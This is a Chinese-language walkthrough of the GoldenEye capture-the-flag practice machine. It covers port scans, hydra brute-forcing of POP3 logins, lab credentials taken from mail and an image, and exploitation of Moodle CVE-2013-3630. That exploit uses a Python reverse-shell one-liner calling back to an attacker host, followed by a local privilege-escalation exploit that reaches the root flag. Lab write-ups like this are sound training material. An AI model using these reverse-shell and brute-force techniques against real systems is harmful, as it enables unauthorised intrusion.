1.GoldenEye

靶场链接:

链接:https://pan.baidu.com/s/1KvXbS905tdu-__KBN2_tTA
提取码:5fow
复制这段内容后打开百度网盘手机App,操作更方便哦

 

GoldenEye靶场渗透测试过程:

1.使用信息搜集工具查找服务(内网搭建,靶机地址(192.169.8.144)):

 

使用railgun扫描端口结果:

1.GoldenEye

 

 

 

使用nmap扫描端口结果:(nmap速度上完虐普通端口扫描工具)

1.GoldenEye

 

 

2.访问80端口服务,发现js文件存储一个地址和用户名密码:

1.GoldenEye

 

 

 1.GoldenEye

 

 

 直接百度翻译(编码方式是HTML编码):

1.GoldenEye

 

根据提示获得用户名/密码:boris/InvincibleHack3r

 注意:提示给出的Boris但是能够成功登录的是小写的用户名boris,若是猜不到用户名可以通过burpsuite抓包看一下登录信息进行爆破,登录信息使用的是base64加密方式。

1.GoldenEye

1.GoldenEye

 

 

3.login之后发现新的提示

1.GoldenEye

 

1.GoldenEye

 

 

 直接使用hydra工具爆破一波,获得pop3用户名密码如下:

natalya:bird
boris:secret1!

不懂直接百度翻译一波,发现pop3的服务被放在55007上了。

 1.GoldenEye

 

 

 3.直接telnet此端口的命令,natalya使用同样的命令:

user boris

pass secret1!

list

retr m        -m指的第几封邮件

1.GoldenEye

 

 

 发现新的用户名密码,同时提示访问网站不允许ip地址访问要映射修改hosts文件

1.GoldenEye

 

 

 通过邮件搜集的用户名密码:xenia:RCP90rulez! 可以成功登录系统,在邮件中又发现新的pop3用户名:doak,在来一次爆破得到密码:goat

1.GoldenEye

 

翻译交流信息:

1.GoldenEye

 

 

 

 

 

 

 1.GoldenEye

 

 

 获得新的平台用户名密码:

username: dr_doak    

password: 4England!

4.在新的用户账号找到一个s3cret.txt文件

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

我能够捕捉到这个应用程序ADM1NCR3DS通过清除txt。
GoldenEye服务器中的大多数web应用程序中的文本都会被扫描,所以我不能在这里添加cr3元素。
这里有一些有趣的东西:/dir007key/for-007.jpg
你可能也知道,RCP-90比任何其他武器都要优越得多,而杀人执照是唯一的游戏方式。

 

5.下载照片到kali中使用strings分析for-007.jpg,找到"xWinter1995x!"试了以下发现是moodle平台的admin账户密码。

 1.GoldenEye

 

 

 

6.搜索moodle平台漏洞,发现存在远程命令执行漏洞CVE-2013-3630

Settings-->Site administration-->Server-->System paths-->Path to aspell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.154",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

通过使用kali的nc接收:

1.GoldenEye

 

 

 

7.提权操作:

此服务的系统版本如下:

1.GoldenEye

 

 

 使用searchsploit工具查看该版本的本地提权漏洞:

1.GoldenEye

 

 

 未次系统上发现gcc编译器,但是发现在cc编译器。将exp代码改为cc进行编译

1.GoldenEye

 

 

 1.GoldenEye

 

 

 

1.GoldenEye

 

 

 

1.GoldenEye

 

 

 在/root获得最终密码:

drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

 

1.GoldenEye

 

 

 

 

pop3

上一篇:Dockerfile的制作httpd镜像命令


下一篇:mysql表的物理存储结构及逻辑结构